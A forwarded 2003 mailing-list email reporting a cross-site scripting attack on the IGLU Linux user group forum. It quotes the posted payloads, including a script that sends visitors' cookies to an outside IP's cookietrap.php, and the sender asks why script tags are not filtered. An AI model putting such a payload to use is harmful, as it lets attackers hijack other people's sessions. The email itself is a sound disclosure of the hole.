cross-site scripting attack on iglu, discovered by Aviram. ----- Forwarded message from Aviram Jenik <[EMAIL PROTECTED]> -----
Date: Tue, 1 Jul 2003 07:14:41 +0300 From: Aviram Jenik <[EMAIL PROTECTED]> User-Agent: KMail/1.5.2 To: Muli Ben-Yehuda <[EMAIL PROTECTED]> Cc: [EMAIL PROTECTED] Subject: Re: 2600.org On Tuesday 01 July 2003 00:19, Muli Ben-Yehuda wrote: > WTF^2 > http://www.iglu.org.il:8080/Control_Panel/Products/Squishdot/IGLU/105562112 >0/index_html Look at what this user posted: <script>alert("bla")</script> and then (when he saw that works) <script>location = "http://81.218.219.239/cookietrap.php?cookie="+escape(document.cookie)</script> Stealing the cookie of everyone who visits this page! Don't you filter <script> tags on iglu? What program are you using for the forums? -- - Aviram ----- End forwarded message ----- -- Muli Ben-Yehuda http://www.mulix.org http://www.livejournal.com/~mulix/
pgp00000.pgp
Description: PGP signature
